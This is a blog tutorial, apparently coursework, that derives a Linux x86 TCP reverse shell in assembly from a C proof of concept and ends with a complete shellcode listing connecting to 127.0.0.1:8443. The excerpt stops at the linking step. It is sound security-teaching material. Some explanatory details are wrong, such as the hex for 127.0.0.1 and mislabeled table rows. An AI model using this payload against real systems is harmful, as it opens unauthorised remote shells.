{"id":614,"date":"2020-07-21T18:45:31","date_gmt":"2020-07-21T18:45:31","guid":{"rendered":"http:\/\/mosunit.com\/?p=614"},"modified":"2020-07-21T18:45:33","modified_gmt":"2020-07-21T18:45:33","slug":"creating-linux-x86-reverse-shell-in-assembly","status":"publish","type":"post","link":"https:\/\/mosunit.com\/?p=614","title":{"rendered":"Creating Linux x86 reverse shell in Assembly"},"content":{"rendered":"\n<p>In the <a rel=\"noreferrer noopener\" href=\"https:\/\/mosunit.com\/?p=482\" target=\"_blank\">last post<\/a>, I covered the walk through of bind shellcode in assembly. In this post, I will work on the same lines and will create a reverse shell in assembly.<\/p>\n\n\n\n<p>The reference point will be same as earlier &#8211; analysis of the C reverse shell code, extract the information and then port it to assembly.<\/p>\n\n\n\n<p>The aim of this post is somewhat similar to the last post. Specifically, the post will target the following:<\/p>\n\n\n\n<p><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Create a TCP reverse shell that spawns a shell over port 8443<\/li><li>Create a wrapper script to make the IP and port easily reconfigurable<\/li><\/ul>\n\n\n\n<p><\/p>\n\n\n\n<p>I will jump right into the analysis of the C proof of concept and then work my way into the assembly code. If you want more insight on the approach, please refer to the my <a rel=\"noreferrer noopener\" href=\"https:\/\/mosunit.com\/?p=482\" target=\"_blank\">previous post<\/a> which talked about the approach in a bit more detail.<\/p>\n\n\n\n<p>As with the C code for bind shell, I found the C code for reverse shell too at <a rel=\"noreferrer noopener\" href=\"https:\/\/azeria-labs.com\/tcp-reverse-shell-in-assembly-arm-32-bit\/\" target=\"_blank\">https:\/\/azeria-labs.com\/tcp-reverse-shell-in-assembly-arm-32-bit\/<\/a>. <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Analyzing the C proof of concept<\/h2>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;unistd.h>\n#include &lt;sys\/socket.h>\n#include &lt;netinet\/in.h>\n \nint main(void)\n{\n int sockfd; \/\/ socket file descriptor\n socklen_t socklen; \/\/ socket-length for new connections\n \n struct sockaddr_in addr; \/\/ client address\n \n addr.sin_family = AF_INET; \/\/ server socket type address family = internet protocol address\n addr.sin_port = htons( 1337 ); \/\/ connect-back port, converted to network byte order\n addr.sin_addr.s_addr = inet_addr(\"127.0.0.1\"); \/\/ connect-back ip , converted to network byte order\n \n \/\/ create new TCP socket\n sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );\n \n \/\/ connect socket\n connect(sockfd, (struct sockaddr *)&amp;addr, sizeof(addr));\n \n \/\/  Duplicate file descriptors for STDIN, STDOUT and STDERR\n dup2(sockfd, 0);\n dup2(sockfd, 1);\n dup2(sockfd, 2);\n \n \/\/ spawn shell\n execve( \"\/bin\/sh\", NULL, NULL );\n}<\/pre>\n\n\n\n<p>If you read the code, you will notice the difference between this and the C code for bind shell. In this, instead of binding a local port and listening for a connection using <em>bind <\/em>syscall, we are connecting to a remote system using <em>connect <\/em>syscall. The rest of the syscalls are same. So, this code can be broken down into the following:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Create a socket<\/li><li>Connect socket to remote system<\/li><li>Duplicate the file descriptors for STDIN, STDOUT and STDERR<\/li><li>Spawn the shell<\/li><\/ul>\n\n\n\n<p><\/p>\n\n\n\n<p>Let&#8217;s look at each syscall and write the assembly code for it.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Create a socket<\/h2>\n\n\n\n<p>The first syscall is the same as bind shell. So, I have the same writeup as for bind shell. <\/p>\n\n\n\n<p>The first step is to create a socket. The relevant C code snippet is below:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"monokai\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">host_sockid = socket(PF_INET, SOCK_STREAM, 0);\u00a0<\/pre>\n\n\n\n<p>The C code tells us that the <em>socket <\/em>syscall needs to be invoked. A quick reference to the <code><em>\/usr\/include\/i386-linux-gnu\/asm\/unistd_32.h<\/em><\/code> file reveals the syscall number of the <em>socketcall <\/em>syscall<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"abap\" data-enlighter-theme=\"monokai\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#define __NR_socketcall 102<\/pre>\n\n\n\n<p>The sycall number associated with <em>socketcall <\/em>is <code>102<\/code>. The man reference shows the parameters of this syscall:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int socketcall(int call, unsigned long *args);<\/pre>\n\n\n\n<p>We can reference the different function call of <em>socketcall <\/em>syscall in <code><em>\/usr\/include\/linux\/net.h<\/em><\/code>. Following snippet shows the syscalls we need to invoke for a TCP reverse shell. Please make a note as this will be referenced in later parts of the post too.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"abap\" data-enlighter-theme=\"monokai\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#ifndef _LINUX_NET_H\n#define _LINUX_NET_H\n\n#include &lt;linux\/socket.h>\n#include &lt;asm\/socket.h>\n\n#define NPROTO          AF_MAX\n\n#define SYS_SOCKET      1               \/* sys_socket(2)                *\/\n#define SYS_BIND        2               \/* sys_bind(2)                  *\/\n#define SYS_CONNECT     3               \/* sys_connect(2)               *\/\n#define SYS_LISTEN      4               \/* sys_listen(2)                *\/\n#define SYS_ACCEPT      5               \/* sys_accept(2)                *\/<\/pre>\n\n\n\n<p>As shown, to create a socket, the value of the <em>call <\/em>will be <em>&#8220;1&#8221;<\/em>. The <em>args<\/em> will then point to arguments of <em>socket<\/em> syscall.<\/p>\n\n\n\n<figure class=\"wp-block-table is-style-regular\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man reference<\/th><th>C code reference<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Determines which socket function to invoke<\/td><td>NA<\/td><td>1<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Points to a block containing the actual arguments<\/td><td>NA<\/td><td>&lt;address of socket syscall arguments&gt;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>The man reference of the <em>socket <\/em>syscall is below:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"monokai\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int socket(int domain, int type, int protocol);\n<\/pre>\n\n\n\n<p>Let&#8217;s look at each argument and refer our proof of concept C code for values being passed in it.<\/p>\n\n\n\n<figure class=\"wp-block-table is-style-regular\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man reference<\/th><th>C code reference<\/th><\/tr><\/thead><tbody><tr><td>socket<\/td><td>domain<\/td><td>Specifies a communication domain; this selects the protocol family which will be used for communication<\/td><td>PF_INET<\/td><\/tr><tr><td>socket<\/td><td>type<\/td><td>The socket has the indicated type, which specifies the communication semantics<\/td><td>SOCK_STREAM<\/td><\/tr><tr><td>socket<\/td><td>protocol<\/td><td>Specifies a particular protocol to be used with the socket<\/td><td>0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>The value of domain can be found at<code><em>\/usr\/include\/i386-linux-gnu\/bits\/socket.h<\/em><\/code>; which refers to the IPv4 family. PF_INET is a synonym for AF_INET.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"abap\" data-enlighter-theme=\"monokai\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#define PF_INET         2       \/* IP protocol family.  *\/\n#define AF_INET         PF_INET\n<\/pre>\n\n\n\n<p>The value of type can be found at<code><em>\/usr\/include\/i386-linux-gnu\/bits\/socket_type.h<\/em><\/code>; which refers to connection oriented stream.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"monokai\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">  SOCK_STREAM = 1,              \/* Sequenced, reliable, connection-based byte streams.  *\/<\/pre>\n\n\n\n<p>The value of protocol can be found at<code><em>\/usr\/include\/linux\/in.h<\/em><\/code>; which refers to TCP protocol<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"monokai\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">IPPROTO_IP = 0, \/* Dummy protocol for TCP *\/<\/pre>\n\n\n\n<p>The table below is updated with values of all arguments for <em>socketcall <\/em>syscall which calls <em>socket <\/em>syscall.<\/p>\n\n\n\n<figure class=\"wp-block-table is-style-regular\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man reference<\/th><th>C code reference<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Determines which socket function to invoke<\/td><td>NA<\/td><td>EBX &#8211; 1<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Points to a block containing the actual arguments<\/td><td>NA<\/td><td>ECX &#8211; &lt;address of arguments of socket syscall&gt;<\/td><\/tr><tr><td>socket<\/td><td>domain<\/td><td>Specifies a communication domain; this selects the protocol family which will be used for communication<\/td><td>PF_INET<\/td><td>2<\/td><\/tr><tr><td>socket<\/td><td>type<\/td><td>The socket has the indicated type, which specifies the communication semantics<\/td><td>SOCK_STREAM<\/td><td>1<\/td><\/tr><tr><td>socket<\/td><td>protocol<\/td><td>Specifies a particular protocol to be used with the socket<\/td><td>0<\/td><td>0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>As we have the all the data with us, we can now move forward to write the assembly code to create a socket. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">global _start\n\nsection .text\n\n_start:\n\n; Creating a socket\n\n        ; move decimal 102 in eax - socketcall syscall\n        xor eax, eax\n        mov al, 0x66    ;converted to hex\n\n        ; set the call argument to 1 - SOCKET syscall\n        xor ebx, ebx\n        mov bl, 0x1\n\n        ; push value of protocol, type and domain on stack - socket syscall\n        ; int socket(int domain, int type, int protocol);\n        ; arguments pushed in reverse order\n        xor ecx, ecx\n        push ecx        ; Protocol = 0\n        push 0x1        ; Type = 1 (SOCK_STREAM)\n        push 0x2        ; Domain = 2 (AF_INET)\n\n        ; set value of ecx to point to top of stack - points to block of arguments for socketcall syscall\n        mov ecx, esp\n\n        int 0x80<\/pre>\n\n\n\n<p>This completes our first and important stage of the assembly program. We can now follow the same approach in evaluating other sycalls and writing the assembly code.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Connect socket to remote system<\/h2>\n\n\n\n<p>The relevant C code snippet for <em>connect <\/em>syscall is below:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/\/ connect socket\n connect(sockfd, (struct sockaddr *)&amp;addr, sizeof(addr));<\/pre>\n\n\n\n<p>We will invoke <em>connect <\/em>syscall function from <em>socketcall <\/em>syscall. To bind the socket, the value of the <em>call <\/em>will be <em>&#8220;3&#8221;<\/em> (as referenced from <em>net.h <\/em>earlier). The <em>args<\/em> will then point to arguments of <em>connect <\/em>syscall.<\/p>\n\n\n\n<p>The man reference of the <em>connect <\/em>syscall is below:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);<\/pre>\n\n\n\n<p>Let&#8217;s look at each argument and refer our proof of concept C code for values being passed in it.<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man reference<\/th><th>C code reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Determines which socket function to invoke<\/td><td>NA<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Points to a block containing the actual arguments<\/td><td>NA<\/td><\/tr><tr><td>connect<\/td><td>sockfd<\/td><td>bind() assigns the address specified by addr to the<br>socket referred to by the file descriptor sockfd<\/td><td>sockfd<\/td><\/tr><tr><td>connect<\/td><td>addr<\/td><td>bind() assigns the address specified by addr to the<br>socket referred to by the file descriptor sockfd<\/td><td>&amp;addr<\/td><\/tr><tr><td>connect<\/td><td>addrlen<\/td><td>addrlen specifies the size, in bytes, of the address structure pointed to by addr<\/td><td>sizeof(addr)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Notice that the <em>connect <\/em>syscall is exactly same as the <em>bind <\/em>syscall. The only difference is that instead of binding to the local IP and port, we will connect to remote IP and port. So, the structure of the <em>sockaddr<\/em> will be same as that we had in the <em>bind <\/em>syscall.<\/p>\n\n\n\n<p>The first argument, which is <em>sockfd, <\/em>is nothing but the return value of previous syscall; which is a socket file descriptor returned by <em>socket <\/em>syscall.<\/p>\n\n\n\n<p>The <em>addr <\/em>argument is same as that we had in the <em>bind<\/em> syscall and it<em> <\/em>points to <em>sockaddr <\/em>structure, which is defined as follows:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">struct sockaddr_in {\n   short int            sin_family;\n   unsigned short int   sin_port;\n   struct in_addr       sin_addr;\n   unsigned char        sin_zero[8];\n};<\/pre>\n\n\n\n<p>Let&#8217;s visualize this in a table with reference to our proof of concept C code:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Structure elements<\/th><th>Description<\/th><th>C reference<\/th><\/tr><\/thead><tbody><tr><td>sin_family<\/td><td>Represents an address family<\/td><td>AF_INET<\/td><\/tr><tr><td>sin_port<\/td><td>16-bit port number in Network Byte Order<\/td><td>1337<\/td><\/tr><tr><td>sin_addr<\/td><td>32-bit IP address in Network Byte Order<\/td><td>127.0.0.1<\/td><\/tr><tr><td>sin_zero<\/td><td>Not used<\/td><td>NA<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>As the address family is IPv4, the value of <em>sin_family <\/em>will PF_INET\/AF_INET and the integer value will be same as that in previous syscall.<\/p>\n\n\n\n<p>The value of <em>sin_port<\/em> in the C code is 1337. Let&#8217; change this to 8443 in our shellcode. 8443 converts to 20FB in hex. To push it on the stack, we need to reverse it to <em>0xFB20<\/em>; which is due to little endian format.<\/p>\n\n\n\n<p>In the bind shell, we kept the value to <em>sin_address<\/em> to 0.0.0.0. However, in this case, we want our shell to connect back to a specific IP address. Let&#8217;s change this to the localhost IP for now, which is 127.0.0.1. The IP address is of 32 bits i.e. 4 bytes. So, in hex, 127.0.0.1 translates to <em>75 00 00 01<\/em>. Reversing this to comply with little endian format, we need to push<em> 0x0100007f<\/em> on the stack.<\/p>\n\n\n\n<p>The table below is updated with values of all arguments for <em>socketcall <\/em>syscall, which calls the <em>accept <\/em>syscall:<\/p>\n\n\n\n<p>The last argument <em>addrlen <\/em>will be <em>16<\/em>, which is the size of <em>sockaddr_in<\/em> structure.<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man reference<\/th><th>C code reference<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Determines which socket function to invoke<\/td><td>NA<\/td><td>EBX \u2013 3<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Points to a block containing the actual arguments<\/td><td>NA<\/td><td>ECX \u2013 &lt;address of arguments of bind syscall&gt;<\/td><\/tr><tr><td>connect<\/td><td>sockfd<\/td><td>bind() assigns the address specified by addr to the<br>socket referred to by the file descriptor sockfd<\/td><td>sockfd<\/td><td>EDX \u2013 &lt;return value from socket syscall&gt;<\/td><\/tr><tr><td>connect<\/td><td>addr<\/td><td>bind() assigns the address specified by addr to the<br>socket referred to by the file descriptor sockfd<\/td><td>&amp;addr<\/td><td>ESI \u2013 &lt;address of sockaddr_in struct&gt;<\/td><\/tr><tr><td>connect<\/td><td>addrlen<\/td><td>addrlen specifies the size, in bytes, of the address structure pointed to by addr<\/td><td>sizeof(addr)<\/td><td>16<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>The values for <em>sockaddr_in<\/em> structure is also summarized below:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Structure elements<\/th><th>Description<\/th><th>C reference<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>sin_family<\/td><td>Represents an address family<\/td><td>AF_INET<\/td><td>2<\/td><\/tr><tr><td>sin_family<\/td><td>16-bit port number in Network Byte Order<\/td><td>1337<\/td><td><em>0xFB20<\/em><\/td><\/tr><tr><td>sin_addr<\/td><td>32-bit IP address in Network Byte Order<\/td><td>127.0.0.1<\/td><td>0x0100007f<\/td><\/tr><tr><td>sin_zero<\/td><td>Not used<\/td><td>NA<\/td><td>NA<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Using the above information, the following assembly code for <em>connect <\/em>syscall is created.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">; Connect socket to remote system\n\n        ; save return value of socket syscall - socket file descriptor\n        xor edx, edx\n        mov edx, eax\n\n        ; move decimal 102 in eax - socketcall syscall\n        mov al, 0x66    ;converted to hex\n\n        ; set the call argument to 3 - connect syscall\n        mov bl, 0x3\n\n        ; push sockaddr structure on the stack\n        ; struct sockaddr {\n        ;       sa_family_t sa_family;\n        ;       char        sa_data[14];\n        ;       }\n        xor ecx, ecx\n        push 0x0100007f         ; s_addr = 127.0.0.1\n        push word 0xfb20        ; port = 8443\n        push word 0x2           ; family = AF_INET\n\n        mov esi, esp            ; save address of sockaddr struct\n\n        ; push values of addrlen, addr and sockfd on the stack\n        ; bind(host_sockid, (struct sockaddr*) &amp;addr, sizeof(addr));\n        push 0x10               ; strlen =16\n        push esi                ; address of sockaddr structure\n        push edx                ; file descriptor returned from socket syscall\n\n        ; set value of ecx to point to top of stack - points to block of arguments for bind syscall\n        mov ecx, esp\n        int 0x80\n<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Redirect STDIN, STDOUT and STDERR via DUP2<\/h2>\n\n\n\n<p>For the reverse shell to be interactive and to actually work, like we did in the bind shell, we need to redirect the STDIN, STDOUT and STDERR to socket file descriptor created in previous syscall.<\/p>\n\n\n\n<p>The relevant C code snippet for <em>dup2 <\/em>syscall is below:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/\/  Duplicate file descriptors for STDIN, STDOUT and STDERR\n dup2(sockfd, 0);\n dup2(sockfd, 1);\n dup2(sockfd, 2);<\/pre>\n\n\n\n<p> The man reference of <em>dup2<\/em> syscall is below:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int dup2(int oldfd, int newfd);<\/pre>\n\n\n\n<p>The<em> dup2<\/em> system call creates a copy of the file descriptor <em>oldfd<\/em>, using the file descriptor number specified in <em>newfd<\/em>. So, we will need to loop over <em>dup2 <\/em>call three times to map STDIN, STDOUT, STDERR to 0, 1 and 2 respectively.<\/p>\n\n\n\n<figure class=\"wp-block-table is-style-regular\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man reference<\/th><th>C code reference<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>dup2<\/td><td>oldfd<\/td><td>file descriptor<\/td><td>sockfd<\/td><td>EBX &#8211; &lt;return value of socket syscall &#8211; socket file descriptor><\/td><\/tr><tr><td>accept<\/td><td>newfd<\/td><td>file descriptor<\/td><td>0, 1 and 2 (three syscalls)<\/td><td>0, 1 and 2 (three syscalls)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Using the above information, the following assembly code for <em>dup2 <\/em>syscalls is created.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">; Duplicate file descriptors\n\n        ; push arguments for dup2 syscall\n        ; int dup2(int oldfd, int newfd);\n        ; dup2 syscall - setting STDIN;\n        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall\n        mov ebx, edx            ; move return value of sockfd (return value of socket syscall) in ebx\n        xor ecx, ecx\n        int 0x80\n\n        ; dup2 syscall - setting STDOUT\n        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall\n        mov cl, 0x1\n        int 0x80\n\n        ; dup2 syscall - setting STDERR\n        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall\n        mov cl, 0x2\n        int 0x80<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Execute \/bin\/sh<\/h2>\n\n\n\n<p>This is the last part of our reverse shellcode, and it is exactly the same what we had in the bind shellcode. Once the client connects, we need to execute <em>\/bin\/sh<\/em> to spawn a shell. For this, we need <em>execve <\/em>syscall.<\/p>\n\n\n\n<p>The relevant C code snippet for <em>execve <\/em>syscall is below:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/\/ Execute \/bin\/sh\u00a0\nexecve(\"\/bin\/sh\", NULL, NULL);\u00a0<\/pre>\n\n\n\n<p>The man reference of the <em>execve <\/em>syscall is below:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int execve(const char *pathname, char *const argv[], char *const envp[]);<\/pre>\n\n\n\n<p>The only part interesting for us is the pointer to <em>pathname<\/em>, which is the file which we want to execute. In our case, that is \/bin\/sh. <\/p>\n\n\n\n<p>As <em>&#8220;\/bin\/sh&#8221;<\/em> is of 7 bytes, we can add an additional <em>&#8220;\/&#8221;<\/em> to make it 8, which is easier for us to push on the stack. So, <em>pathname <\/em>will be &#8220;\/\/bin\/sh&#8221; (which is same as <em>\/bin\/sh<\/em>; adding <em>&#8220;\/&#8221;<\/em> does not make a difference !)<\/p>\n\n\n\n<p>As mentioned previously, <em>&#8220;\/\/bin\/sh&#8221; <\/em>will be pushed on the stack in reverse due to little endian format. Also, as we are dealing with filename\/string, this has to be null terminated.<\/p>\n\n\n\n<p>The final data looks like this:<\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-table is-style-regular\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man reference<\/th><th>C code reference<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>execve<\/td><td>*pathname<\/td><td>Execve() executes the program referred to by pathname<\/td><td>\/bin\/sh<\/td><td>hs\/nib\/\/0x00000000<br><\/td><\/tr><tr><td>execve<\/td><td>argv[]<\/td><td>Array of pointers to strings passed to the new program as its command-line arguments<\/td><td>NULL<\/td><td>0<\/td><\/tr><tr><td>execve<\/td><td>envp[]<\/td><td>Array of pointers to strings, conventionally of the form key=value, which are passed as the environment of the new program<\/td><td>NULL<\/td><td>0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Translating this to assembly, we have the following code:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">; Execute \/bin\/sh\n\n        ; exeve syscall\n        mov al, 0xb\n\n        ; int execve(const char *pathname, char *const argv[], char *const envp[]);\n        ; push \/\/bin\/sh on stack\n        xor ebx, ebx\n        push ebx                ; Null\n        push 0x68732f6e         ; hs\/n : 68732f6e\n        push 0x69622f2f         ; ib\/\/ : 69622f2f\n        mov ebx, esp\n\n        xor ecx, ecx\n        xor edx, edx\n\n        int 0x80\n<\/pre>\n\n\n\n<p>Here we go ! Our final shellcode is ready. Merging all the of the above, we get the following:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">; Purpose:      Linux x86 Reverse Shell\n; Author:       Mohit Suyal (@mosunit)\n; Studen ID:    PA-16521\n; Blog:         https:\/\/mosunit.com\n\nglobal _start\n\nsection .text\n\nglobal _start\n\nsection .text\n\n_start:\n\n; Creating a socket\n\n        ; move decimal 102 in eax - socketcall syscall\n        xor eax, eax\n        mov al, 0x66    ;converted to hex\n\n        ; set the call argument to 1 - SOCKET syscall\n        xor ebx, ebx\n        mov bl, 0x1\n\n        ; push value of protocol, type and domain on stack - socket syscall\n        ; int socket(int domain, int type, int protocol);\n        ; arguments pushed in reverse order\n        xor ecx, ecx\n        push ecx        ; Protocol = 0\n        push 0x1        ; Type = 1 (SOCK_STREAM)\n        push 0x2        ; Domain = 2 (AF_INET)\n\n        ; set value of ecx to point to top of stack - points to block of arguments for socketcall syscall\n        mov ecx, esp\n\n        int 0x80\n\n; Connect socket to remote system\n\n        ; save return value of socket syscall - socket file descriptor\n        xor edx, edx\n        mov edx, eax\n\n        ; move decimal 102 in eax - socketcall syscall\n        mov al, 0x66    ;converted to hex\n\n        ; set the call argument to 3 - connect syscall\n        mov bl, 0x3\n\n        ; push sockaddr structure on the stack\n        ; struct sockaddr {\n        ;       sa_family_t sa_family;\n        ;       char        sa_data[14];\n        ;       }\n        xor ecx, ecx\n        push 0x0100007f         ; s_addr = 127.0.0.1\n        push word 0xfb20        ; port = 8443\n        push word 0x2           ; family = AF_INET\n\n        mov esi, esp            ; save address of sockaddr struct\n\n        ; push values of addrlen, addr and sockfd on the stack\n        ; bind(host_sockid, (struct sockaddr*) &amp;addr, sizeof(addr));\n        push 0x10               ; strlen =16\n        push esi                ; address of sockaddr structure\n        push edx                ; file descriptor returned from socket syscall\n\n        ; set value of ecx to point to top of stack - points to block of arguments for bind syscall\n        mov ecx, esp\n        int 0x80\n\n; Duplicate file descriptors\n\n        ; push arguments for dup2 syscall\n        ; int dup2(int oldfd, int newfd);\n        ; dup2 syscall - setting STDIN;\n        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall\n        mov ebx, edx            ; move reture value of sockfd (return value of socket syscall) in ebx\n        xor ecx, ecx\n        int 0x80\n\n        ; dup2 syscall - setting STDOUT\n        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall\n        mov cl, 0x1\n        int 0x80\n\n        ; dup2 syscall - setting STDERR\n        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall\n        mov cl, 0x2\n        int 0x80\n\n\n; Execute \/bin\/sh\n\n        ; exeve syscall\n        mov al, 0xb\n\n        ; int execve(const char *pathname, char *const argv[], char *const envp[]);\n        ; push \/\/bin\/sh on stack\n        xor ebx, ebx\n        push ebx                    ; Null\n        push 0x68732f6e        ; hs\/n : 68732f6e\n        push 0x69622f2f         ; ib\/\/ : 69622f2f\n        mov ebx, esp\n\n        xor ecx, ecx\n        xor edx, edx\n\n        int 0x80<\/pre>\n\n\n\n<p>The next step is to assemble and link the the code.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"abap\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" 